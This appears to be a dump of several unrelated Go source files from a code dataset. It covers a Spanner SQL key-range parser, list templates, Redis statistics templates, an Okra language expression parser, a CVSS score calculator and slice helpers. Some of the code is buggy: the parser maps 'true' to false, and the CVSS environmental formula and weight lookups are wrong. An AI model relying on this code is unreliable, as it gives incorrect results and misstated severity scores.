k1.Start.AddArgs(key.LowerValue)
k1.End.AddArgs(key.UpperValue)
}
func (k *MergableKeyRange) ToKeyRange(args []driver.Value) (*spanner.KeyRange, error) {
low := k.LowerOpen
up := k.UpperOpen
var kind spanner.KeyRangeKind
if low && up {
kind = spanner.OpenOpen
} else if low && !up {
kind = spanner.OpenClosed
} else if !low && up {
kind = spanner.ClosedOpen
} else {
kind = spanner.ClosedClosed
}
start, err := k.Start.GetFilledArgs(args)
if err != nil {
return nil, err
}
end, err := k.End.GetFilledArgs(args)
if err != nil {
return nil, err
}
return &spanner.KeyRange{
Start: start,
End: end,
Kind: kind,
}, nil
}
func (k1 *MergableKeyRange) mergeKey(k2 *Key) error {
fmt.Printf("\nmerging into k1: %#v\n k2: %#v\n\n", k1, k2)
if k2.HaveLower {
if k1.LowerOpen != k2.LowerOpen {
return fmt.Errorf("Kinds in ranges must all match")
}
k1.Start.AddArgs(k2.LowerValue)
}
if k2.HaveUpper {
if k1.UpperOpen != k2.UpperOpen {
return fmt.Errorf("Kinds in ranges must all match")
}
k1.End.AddArgs(k2.UpperValue)
}
return nil
}
func (a *AwareKeySet) addKeyFromValExpr(valExpr sqlparser.ValExpr) (*Key, error) {
col, ok := valExpr.(*sqlparser.ColName)
if !ok {
return nil, fmt.Errorf("not a valid column name")
}
if len(col.Qualifier) != 0 {
return nil, fmt.Errorf("qualifiers not allowed")
}
keyName := string(col.Name[:])
if a.Keys[keyName] == nil {
a.KeyOrder = append(a.KeyOrder, keyName)
a.Keys[keyName] = &Key{Name: keyName}
}
return a.Keys[keyName], nil
}
func (a *AwareKeySet) walkBoolExpr(boolExpr sqlparser.BoolExpr) error {
switch expr := boolExpr.(type) {
case *sqlparser.AndExpr:
fmt.Printf("AndExpr %#v\n", expr)
err := a.walkBoolExpr(expr.Left)
if err != nil {
return err
}
err = a.walkBoolExpr(expr.Right)
if err != nil {
return err
}
return nil
case *sqlparser.OrExpr:
fmt.Printf("OrExpr %#v\n", expr)
return fmt.Errorf("Or Expressions are not currently supported")
case *sqlparser.ParenBoolExpr:
fmt.Printf("ParenBoolExpr %#v\n", expr)
case *sqlparser.ComparisonExpr:
fmt.Printf("ComparisonExpr %#v\n", expr)
myKey, err := a.addKeyFromValExpr(expr.Left)
if err != nil {
return err
}
val, err := a.Args.ParseValExpr(expr.Right)
if err != nil {
return err
}
fmt.Printf("OPERTATOR %#v\n", expr.Operator)
switch expr.Operator {
case "=":
myKey.LowerValue = val
myKey.UpperValue = val
myKey.LowerOpen = false
myKey.UpperOpen = false
myKey.HaveUpper = true
myKey.HaveLower = true
return nil
case ">":
myKey.LowerValue = val
myKey.LowerOpen = true
myKey.HaveLower = true
return nil
case "<":
myKey.UpperValue = val
myKey.UpperOpen = true
myKey.HaveUpper = true
return nil
case ">=":
myKey.LowerValue = val
myKey.LowerOpen = false
myKey.HaveLower = true
return nil
case "<=":
myKey.UpperValue = val
myKey.UpperOpen = false
myKey.HaveUpper = true
return nil
case "!=":
return fmt.Errorf("!= comparisons are not supported")
case "not in", "in":
return fmt.Errorf("in, and not in comparisons are not supported")
default:
return fmt.Errorf("%#v is not a supported operator", expr.Operator)
}
case *sqlparser.RangeCond:
fmt.Printf("RangeCond %#v\n", expr)
myKey, err := a.addKeyFromValExpr(expr.Left)
if err != nil {
return err
}
from, err := a.Args.ParseValExpr(expr.From)
if err != nil {
return err
}
to, err := a.Args.ParseValExpr(expr.To)
if err != nil {
return err
}
switch expr.Operator {
case "between":
myKey.LowerValue = from
myKey.LowerOpen = true
myKey.UpperValue = to
myKey.UpperOpen = true
case "not between":
return fmt.Errorf("not between operator is not supported")
}
case *sqlparser.ExistsExpr:
fmt.Printf("ExistsExpr %#v\n", expr)
return fmt.Errorf("Exists Expressions are not supported")
default:
fmt.Printf("HITTING DEFAULT %#v\n", boolExpr)
}
return fmt.Errorf("not a boolexpr %#v\n", boolExpr)
} | parse_sql_delete.go | 0.563378 | 0.418459 | parse_sql_delete.go | starcoder |
package list
const predicatedFunctions = `
//-------------------------------------------------------------------------------------------------
// Filter returns a new {{.TName}}List whose elements return true for func.
func (list {{.TName}}List) Filter(fn func({{.PName}}) bool) {{.TName}}Collection {
result := make({{.TName}}List, 0, len(list)/2)
for _, v := range list {
if fn(v) {
result = append(result, v)
}
}
return result
}
// Partition returns two new {{.TName}}Lists whose elements return true or false for the predicate, p.
// The first result consists of all elements that satisfy the predicate and the second result consists of
// all elements that don't. The relative order of the elements in the results is the same as in the
// original list.
func (list {{.TName}}List) Partition(p func({{.PName}}) bool) ({{.TName}}Collection, {{.TName}}Collection) {
matching := make({{.TName}}List, 0, len(list)/2)
others := make({{.TName}}List, 0, len(list)/2)
for _, v := range list {
if p(v) {
matching = append(matching, v)
} else {
others = append(others, v)
}
}
return matching, others
}
// CountBy gives the number elements of {{.TName}}List that return true for the passed predicate.
func (list {{.TName}}List) CountBy(predicate func({{.PName}}) bool) (result int) {
for _, v := range list {
if predicate(v) {
result++
}
}
return
}
// MinBy returns an element of {{.TName}}List containing the minimum value, when compared to other elements
// using a passed func defining ‘less’. In the case of multiple items being equally minimal, the first such
// element is returned. Panics if there are no elements.
func (list {{.TName}}List) MinBy(less func({{.PName}}, {{.PName}}) bool) (result {{.PName}}) {
l := len(list)
if l == 0 {
panic("Cannot determine the minimum of an empty list.")
}
m := 0
for i := 1; i < l; i++ {
if less(list[i], list[m]) {
m = i
}
}
result = list[m]
return
}
// MaxBy returns an element of {{.TName}}List containing the maximum value, when compared to other elements
// using a passed func defining ‘less’. In the case of multiple items being equally maximal, the first such
// element is returned. Panics if there are no elements.
func (list {{.TName}}List) MaxBy(less func({{.PName}}, {{.PName}}) bool) (result {{.PName}}) {
l := len(list)
if l == 0 {
panic("Cannot determine the maximum of an empty list.")
}
m := 0
for i := 1; i < l; i++ {
if less(list[m], list[i]) {
m = i
}
}
result = list[m]
return
}
// DistinctBy returns a new {{.TName}}List whose elements are unique, where equality is defined by a passed func.
func (list {{.TName}}List) DistinctBy(equal func({{.PName}}, {{.PName}}) bool) (result {{.TName}}List) {
Outer:
for _, v := range list {
for _, r := range result {
if equal(v, r) {
continue Outer
}
}
result = append(result, v)
}
return result
}
// IndexWhere finds the index of the first element satisfying some predicate. If none exists, -1 is returned.
func (list {{.TName}}List) IndexWhere(p func({{.PName}}) bool) int {
for i, v := range list {
if p(v) {
return i
}
}
return -1
}
// IndexWhere2 finds the index of the first element satisfying some predicate at or after some start index.
// If none exists, -1 is returned.
func (list {{.TName}}List) IndexWhere2(p func({{.PName}}) bool, from int) int {
for i, v := range list {
if i >= from && p(v) {
return i
}
}
return -1
}
// LastIndexWhere finds the index of the last element satisfying some predicate.
// If none exists, -1 is returned.
func (list {{.TName}}List) LastIndexWhere(p func({{.PName}}) bool) int {
for i := len(list) - 1; i >= 0; i-- {
v := list[i]
if p(v) {
return i
}
}
return -1
}
// LastIndexWhere2 finds the index of the last element satisfying some predicate at or after some start index.
// If none exists, -1 is returned.
func (list {{.TName}}List) LastIndexWhere2(p func({{.PName}}) bool, before int) int {
for i := len(list) - 1; i >= 0; i-- {
v := list[i]
if i <= before && p(v) {
return i
}
}
return -1
}
` | internal/list/predicated.go | 0.784071 | 0.538012 | predicated.go | starcoder |
package reckon
const (
statsTempl = `
{{define "base"}}
# of keys sampled: {{.KeyCount}}
{{ if .StringKeys }}
--- Strings ({{summarize .StringSizes}}) ---
{{template "exampleKeys" .StringKeys}}
{{template "exampleValues" .StringValues}}
Sizes ({{template "stats" .StringSizes}}):
{{template "freq" .StringSizes}}
^2 Sizes:{{template "freq" power .StringSizes}}{{end}}
{{ if .SetKeys }}
--- Sets ({{summarize .SetSizes}}) ---
{{template "exampleKeys" .SetKeys}}
Sizes ({{template "stats" .SetSizes}}):
{{template "freq" .SetSizes}}
^2 Sizes:{{template "freq" power .SetSizes}}
{{template "exampleElements" .SetElements}}
Element Sizes:{{template "freq" .SetElementSizes}}
Element ^2 Sizes:{{template "freq" power .SetElementSizes}}{{end}}
{{ if .SortedSetKeys }}
--- Sorted Sets ({{summarize .SortedSetSizes}}) ---
{{template "exampleKeys" .SortedSetKeys}}
Sizes ({{template "stats" .SortedSetSizes}}):
{{template "freq" .SortedSetSizes}}
^2 Sizes:{{template "freq" power .SortedSetSizes}}
{{template "exampleElements" .SortedSetElements}}
Element Sizes ({{template "stats" .SortedSetElementSizes}}):
{{template "freq" .SortedSetElementSizes}}
Element ^2 Sizes:{{template "freq" power .SortedSetElementSizes}}{{end}}
{{ if .HashKeys }}
--- Hashes ({{summarize .HashSizes}}) ---
{{template "exampleKeys" .HashKeys}}
Sizes ({{template "stats" .HashSizes}}):
{{template "freq" .HashSizes}}
^2 Sizes:{{template "freq" power .HashSizes}}
{{template "exampleElements" .HashElements}}
Element Sizes ({{template "stats" .HashElementSizes}}):
{{template "freq" .HashElementSizes}}
^2 Element Sizes:{{template "freq" power .HashElementSizes}}
{{template "exampleValues" .HashValues}}
Value Sizes ({{template "stats" .HashValueSizes}}):
{{template "freq" .HashValueSizes}}
^2 Value Sizes:{{template "freq" power .HashValueSizes}}{{end}}
{{ if .ListKeys }}
--- Lists ({{summarize .ListSizes}}) ---
{{template "exampleKeys" .ListKeys}}
Sizes ({{template "stats" .ListSizes}}):
{{template "freq" .ListSizes}}
^2 Sizes:{{template "freq" power .ListSizes}}
{{template "exampleElements" .ListElements}}
Element Sizes ({{template "stats" .ListElementSizes}}):
{{template "freq" .ListElementSizes}}
^2 Element Sizes{{template "freq" power .ListElementSizes}}
{{end}}{{end}}
{{define "stats"}}{{ with stats . }}min: {{.Min}} max: {{.Max}} mean: {{fmtFloat .Mean}} std dev: {{fmtFloat .StdDev}}{{end}}{{end}}
{{define "exampleKeys"}}Example Keys:
{{range $k, $v := .}} {{$k}}
{{end}}{{end}}
{{define "exampleValues"}}Example Values:
{{range $k, $v := .}} {{$k}}
{{end}}{{end}}
{{define "exampleElements"}}Example Elements:
{{range $k, $v := .}} {{$k}}
{{end}}{{end}}
{{define "freq"}}
{{ $ss := summarize . }}{{ range $s, $c := .}} {{$s}}: {{$c}} ({{percentage $c $ss }})
{{end}}{{end}}
`
) | templates_text.go | 0.532911 | 0.409811 | templates_text.go | starcoder |
package parse
import (
"github.com/cdkini/Okra/src/interpreter/ast"
"github.com/cdkini/Okra/src/okraerr"
)
// Expression is triggered to parse an Expr or the contents of a Stmt that includes an Expr as a property.
// The method uses recursive descent like the rest of the parser, moving down parser helper methods in order of
// precedence until a set of grammar rules are met.
// Args: nil
// Returns: Instance of Expr that fits the ENBF / context-free grammar rules as set by Okra
func (p *Parser) Expression() ast.Expr {
return p.assignment()
}
func (p *Parser) assignment() ast.Expr {
expr := p.or()
if p.match(ast.Colon) {
prev := p.prevToken()
value := p.assignment()
switch expr := expr.(type) {
case *ast.VariableExpr:
return ast.NewAssignmentExpr(expr.Identifier, value)
case *ast.GetExpr:
return ast.NewSetExpr(expr.Object, expr.Property, value)
default:
curr := p.currToken()
okraerr.ReportErr(curr.Line, curr.Col, "Invalid assignment target: '"+prev.Lexeme+"'.")
}
}
return expr
}
func (p *Parser) or() ast.Expr {
expr := p.and()
for p.match(ast.Or) {
operator := p.prevToken()
rightOperand := p.and()
expr = ast.NewLogicalExpr(expr, operator, rightOperand)
}
return expr
}
func (p *Parser) and() ast.Expr {
expr := p.equality()
for p.match(ast.And) {
operator := p.prevToken()
rightOperand := p.equality()
expr = ast.NewLogicalExpr(expr, operator, rightOperand)
}
return expr
}
func (p *Parser) equality() ast.Expr {
expr := p.comparison()
for p.match(ast.BangEqual, ast.Equal) {
operator := p.prevToken()
rightOperand := p.comparison()
expr = ast.NewBinaryExpr(expr, operator, rightOperand)
}
return expr
}
func (p *Parser) comparison() ast.Expr {
expr := p.additionOrSubtraction()
for p.match(ast.Greater, ast.GreaterEqual, ast.Less, ast.LessEqual) {
operator := p.prevToken()
rightOperand := p.additionOrSubtraction()
expr = ast.NewBinaryExpr(expr, operator, rightOperand)
}
return expr
}
func (p *Parser) additionOrSubtraction() ast.Expr {
expr := p.multiplicationOrDivision()
for p.match(ast.Minus, ast.Plus) {
operator := p.prevToken()
rightOperand := p.multiplicationOrDivision()
expr = ast.NewBinaryExpr(expr, operator, rightOperand)
}
return expr
}
func (p *Parser) multiplicationOrDivision() ast.Expr {
expr := p.unary()
for p.match(ast.Slash, ast.Star) {
operator := p.prevToken()
rightOperand := p.unary()
expr = ast.NewBinaryExpr(expr, operator, rightOperand)
}
return expr
}
func (p *Parser) unary() ast.Expr {
if p.match(ast.Bang, ast.Minus) {
operator := p.prevToken()
operand := p.unary()
return ast.NewUnaryExpr(operator, operand)
}
return p.call()
}
func (p *Parser) call() ast.Expr {
expr := p.primary()
for {
if p.match(ast.LeftParen) {
expr = p.finishCall(expr)
} else if p.match(ast.Dot) {
property := p.consume(ast.Identifier, "Expect property name after '.'.")
expr = ast.NewGetExpr(expr, property)
} else {
break
}
}
return expr
}
func (p *Parser) finishCall(callee ast.Expr) ast.Expr {
var args []ast.Expr
if !p.check(ast.RightParen) {
for {
args = append(args, p.Expression())
if !p.match(ast.Comma) {
break
}
}
}
paren := p.consume(ast.RightParen, "Expect ')' after function arguments.")
return ast.NewCallExpr(callee, paren, args)
}
func (p *Parser) primary() ast.Expr {
switch {
case p.match(ast.False):
return ast.NewLiteralExpr(false)
case p.match(ast.True):
return ast.NewLiteralExpr(false)
case p.match(ast.Null):
return ast.NewLiteralExpr(nil)
case p.match(ast.Numeric):
return ast.NewLiteralExpr(p.prevToken().Literal)
case p.match(ast.String):
return ast.NewLiteralExpr(p.prevToken().Lexeme)
case p.match(ast.Identifier):
return ast.NewVariableExpr(p.prevToken())
case p.match(ast.This):
return ast.NewThisExpr(p.prevToken())
case p.match(ast.LeftParen):
expr := p.Expression()
p.consume(ast.RightParen, "Expect ')' after expression.")
return ast.NewGroupingExpr(expr)
default:
curr := p.currToken()
okraerr.ReportErr(curr.Line, curr.Col, "Expect expression.")
return nil
}
} | src/interpreter/parse/parser_expr.go | 0.73029 | 0.479016 | parser_expr.go | starcoder |
package api
import (
"fmt"
"math"
"regexp"
)
func getMetricValue(key string) float64 {
metricValue := map[string]float64{
"AV:N": 0.85,
"AV:A": 0.62,
"AV:L": 0.55,
"AV:P": 0.2,
"MAV:N": 0.85,
"MAV:A": 0.62,
"MAV:L": 0.55,
"MAV:P": 0.2,
"AC:L": 0.77,
"AC:H": 0.44,
"MAC:L": 0.77,
"MAC:H": 0.44,
"PR:N": 0.85,
"PR:L": 0.62,
"PR:LC": 0.68,
"PR:H": 0.27,
"PR:HC": 0.5,
"MPR:N": 0.85,
"MPR:L": 0.62,
"MPR:LC": 0.68,
"MPR:H": 0.27,
"MPR:HC": 0.5,
"UI:N": 0.85,
"UI:R": 0.62,
"MUI:N": 0.85,
"MUI:R": 0.62,
"C:H": 0.56,
"C:L": 0.22,
"C:N": 0,
"MC:H": 0.56,
"MC:L": 0.22,
"MC:N": 0,
"I:H": 0.56,
"I:L": 0.22,
"I:N": 0,
"MI:H": 0.56,
"MI:L": 0.22,
"MI:N": 0,
"A:H": 0.56,
"A:L": 0.22,
"A:N": 0,
"MA:H": 0.56,
"MA:L": 0.22,
"MA:N": 0,
"E:X": 1,
"E:H": 1,
"E:F": 0.97,
"E:P": 0.94,
"E:U": 0.91,
"RL:X": 1,
"RL:U": 1,
"RL:W": 0.97,
"RL:T": 0.96,
"RL:O": 0.95,
"RC:X": 1,
"RC:C": 1,
"RC:R": 0.96,
"RC:U": 0.92,
}
value, _ := metricValue[key]
return value
}
// BaseScore -
func BaseScore(cvss string) float64 {
metricSections := regexp.MustCompile(`(AV|AC|PR|UI|S|C|I|A):[A-Z]{1,2}`).FindAllString(cvss, -1)
s := metricSections[4]
av := getMetricValue(metricSections[0])
ac := getMetricValue(metricSections[1])
var pr float64
if s == "S:C" && metricSections[2] != "PR:N" {
pr = getMetricValue(fmt.Sprintf("%sC", metricSections[2]))
} else {
pr = getMetricValue(metricSections[2])
}
ui := getMetricValue(metricSections[3])
c := getMetricValue(metricSections[5])
i := getMetricValue(metricSections[6])
a := getMetricValue(metricSections[7])
var iss float64 = 1 - ((1 - c) * (1 - i) * (1 - a))
var impact float64
if s == "S:U" {
impact = 6.42 * iss
} else {
impact = 7.52*(iss-0.029) - 3.25*math.Pow(iss-0.02, 15)
}
exploitability := 8.22 * av * ac * pr * ui
var base float64 = 0
if impact <= 0 {
return base
}
if s == "S:U" {
return math.Ceil((math.Min(impact+exploitability, 10))*10) / 10
}
return math.Ceil(math.Min(1.08*(impact+exploitability), 10)*10) / 10
}
// TemporalScore -
func TemporalScore(cvss string, baseScore float64) float64 {
metricSections := regexp.MustCompile(`(E|RL|RC):[A-Z]{1,2}`).FindAllString(cvss, -1)
e := getMetricValue(metricSections[0])
rl := getMetricValue(metricSections[1])
rc := getMetricValue(metricSections[2])
return math.Ceil((baseScore*e*rl*rc)*10) / 10
}
// EnvironmentalScore -
func EnvironmentalScore(cvss string) float64 {
environmentalMetricSections := regexp.MustCompile(`(CR|IR|AR|MAV|MAC|MPR|MUI|MS|MC|MI|MA):[A-Z]{1,3}`).FindAllString(cvss, -1)
cr := getMetricValue(environmentalMetricSections[0])
ir := getMetricValue(environmentalMetricSections[1])
ar := getMetricValue(environmentalMetricSections[2])
mav := getMetricValue(environmentalMetricSections[3])
mac := getMetricValue(environmentalMetricSections[4])
mpr := getMetricValue(environmentalMetricSections[5])
mui := getMetricValue(environmentalMetricSections[6])
ms := environmentalMetricSections[7]
mc := getMetricValue(environmentalMetricSections[8])
mi := getMetricValue(environmentalMetricSections[9])
ma := getMetricValue(environmentalMetricSections[10])
temporalMetricSections := regexp.MustCompile(`(E|RL|RC):[A-Z]{1,2}`).FindAllString(cvss, -1)
e := getMetricValue(temporalMetricSections[0])
rl := getMetricValue(temporalMetricSections[1])
rc := getMetricValue(temporalMetricSections[2])
miss := math.Min(1-((1-cr-mc)*(1-ir-mi)*(1-ar-ma)), 0.915)
var modifiedImpact float64
if ms == "MS:U" {
modifiedImpact = 6.42 * miss
} else if ms == "MS:C" {
modifiedImpact = 7.52*(miss-0.029) - 3.25*math.Pow((miss*0.9731-0.02), 13)
}
modifiedExploitability := 8.22 * mav * mac * mpr * mui
var environmentalScoreValue float64 = 0
if modifiedImpact <= 0 {
environmentalScoreValue = 0
} else {
if ms == "MS:U" {
environmentalScoreValue = math.Ceil(((math.Ceil(math.Min((modifiedImpact+modifiedExploitability), 10)*10)/10)*e*rl*rc)*10) / 10
} else if ms == "MS:C" {
environmentalScoreValue = math.Ceil(((math.Ceil(math.Min(1.08*(modifiedImpact+modifiedExploitability), 10)*10)/10)*e*rl*rc)*10) / 10
}
}
return environmentalScoreValue
}
// QualitativeSeverity - None, Low, Medium, High
func QualitativeSeverity(score float64) string {
if score == 0 {
return "None"
} else if score > 0 && score < 4 {
return "Low"
} else if score >= 4 && score < 7 {
return "Medium"
} else if score >= 7 && score < 9 {
return "High"
} else {
return "Critical"
}
}
// GetCVSSScore - Calculates CVSS scores and severities
func GetCVSSScore(cvss string) CVSSScore {
cvssScore := CVSSScore{}
cvssScore.BaseScore = BaseScore(cvss)
cvssScore.BaseSeverity = QualitativeSeverity(cvssScore.BaseScore)
cvssScore.TemporalScore = TemporalScore(cvss, cvssScore.BaseScore)
cvssScore.TemporalSeverity = QualitativeSeverity(cvssScore.TemporalScore)
cvssScore.EnvironmentalScore = EnvironmentalScore(cvss)
cvssScore.EnvironmentalSeverity = QualitativeSeverity(cvssScore.EnvironmentalScore)
return cvssScore
} | api/cvss.go | 0.544075 | 0.425546 | cvss.go | starcoder |
package fp
type intSlice []int
type intFunctorForMap func(int) int
type intFunctorForFilter func(int) bool
type intSlicePtr []*int
type intFunctorForMapPtr func(*int) *int
type intFunctorForFilterPtr func(*int) bool
// MakeIntSlice - creates slice for the functional method such as map, filter
func MakeIntSlice(values ...int) intSlice {
newSlice := intSlice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice intSlice) Map(functors ...intFunctorForMap) intSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapInt(f, tmpSlice)
}
return tmpSlice
}
// MakeIntSlicePtr - creates slice for the functional method such as map, filter
func MakeIntSlicePtr(values ...*int) intSlicePtr {
newSlice := intSlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice intSlicePtr) MapPtr(functors ...intFunctorForMapPtr) intSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapIntPtr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice intSlice) Filter(functors ...intFunctorForFilter) intSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterInt(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice intSlicePtr) FilterPtr(functors ...intFunctorForFilterPtr) intSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterIntPtr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice intSlice) Remove(functors ...intFunctorForFilter) intSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice intSlicePtr) RemovePtr(functors ...intFunctorForFilterPtr) intSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveIntPtr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice intSlice) DropWhile(functors ...intFunctorForFilter) intSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice intSlicePtr) DropWhilePtr(functors ...intFunctorForFilterPtr) intSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileIntPtr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice intSlice) Reverse() intSlice {
return ReverseInts(slice)
}
// ReversePtr - reverse the list
func (slice intSlicePtr) ReversePtr() intSlicePtr {
return ReverseIntsPtr(slice)
}
// Distinct - removes duplicates
func (slice intSlice) Distinct() intSlice {
return DistinctInt(slice)
}
// DistinctPtr - removes duplicates
func (slice intSlicePtr) DistinctPtr() intSlicePtr {
return DistinctIntPtr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice intSlice) TakeWhile(functors ...intFunctorForFilter) intSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice intSlicePtr) TakeWhilePtr(functors ...intFunctorForFilterPtr) intSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileIntPtr(f, tmpSlice)
}
return tmpSlice
}
type int64Slice []int64
type int64FunctorForMap func(int64) int64
type int64FunctorForFilter func(int64) bool
type int64SlicePtr []*int64
type int64FunctorForMapPtr func(*int64) *int64
type int64FunctorForFilterPtr func(*int64) bool
// MakeInt64Slice - creates slice for the functional method such as map, filter
func MakeInt64Slice(values ...int64) int64Slice {
newSlice := int64Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice int64Slice) Map(functors ...int64FunctorForMap) int64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapInt64(f, tmpSlice)
}
return tmpSlice
}
// MakeInt64SlicePtr - creates slice for the functional method such as map, filter
func MakeInt64SlicePtr(values ...*int64) int64SlicePtr {
newSlice := int64SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice int64SlicePtr) MapPtr(functors ...int64FunctorForMapPtr) int64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapInt64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice int64Slice) Filter(functors ...int64FunctorForFilter) int64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterInt64(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice int64SlicePtr) FilterPtr(functors ...int64FunctorForFilterPtr) int64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterInt64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice int64Slice) Remove(functors ...int64FunctorForFilter) int64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt64(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice int64SlicePtr) RemovePtr(functors ...int64FunctorForFilterPtr) int64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt64Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice int64Slice) DropWhile(functors ...int64FunctorForFilter) int64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt64(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice int64SlicePtr) DropWhilePtr(functors ...int64FunctorForFilterPtr) int64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice int64Slice) Reverse() int64Slice {
return ReverseInts64(slice)
}
// ReversePtr - reverse the list
func (slice int64SlicePtr) ReversePtr() int64SlicePtr {
return ReverseInts64Ptr(slice)
}
// Distinct - removes duplicates
func (slice int64Slice) Distinct() int64Slice {
return DistinctInt64(slice)
}
// DistinctPtr - removes duplicates
func (slice int64SlicePtr) DistinctPtr() int64SlicePtr {
return DistinctInt64Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int64Slice) TakeWhile(functors ...int64FunctorForFilter) int64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt64(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int64SlicePtr) TakeWhilePtr(functors ...int64FunctorForFilterPtr) int64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt64Ptr(f, tmpSlice)
}
return tmpSlice
}
type int32Slice []int32
type int32FunctorForMap func(int32) int32
type int32FunctorForFilter func(int32) bool
type int32SlicePtr []*int32
type int32FunctorForMapPtr func(*int32) *int32
type int32FunctorForFilterPtr func(*int32) bool
// MakeInt32Slice - creates slice for the functional method such as map, filter
func MakeInt32Slice(values ...int32) int32Slice {
newSlice := int32Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice int32Slice) Map(functors ...int32FunctorForMap) int32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapInt32(f, tmpSlice)
}
return tmpSlice
}
// MakeInt32SlicePtr - creates slice for the functional method such as map, filter
func MakeInt32SlicePtr(values ...*int32) int32SlicePtr {
newSlice := int32SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice int32SlicePtr) MapPtr(functors ...int32FunctorForMapPtr) int32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapInt32Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice int32Slice) Filter(functors ...int32FunctorForFilter) int32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterInt32(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice int32SlicePtr) FilterPtr(functors ...int32FunctorForFilterPtr) int32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterInt32Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice int32Slice) Remove(functors ...int32FunctorForFilter) int32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt32(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice int32SlicePtr) RemovePtr(functors ...int32FunctorForFilterPtr) int32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt32Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice int32Slice) DropWhile(functors ...int32FunctorForFilter) int32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt32(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice int32SlicePtr) DropWhilePtr(functors ...int32FunctorForFilterPtr) int32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt32Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
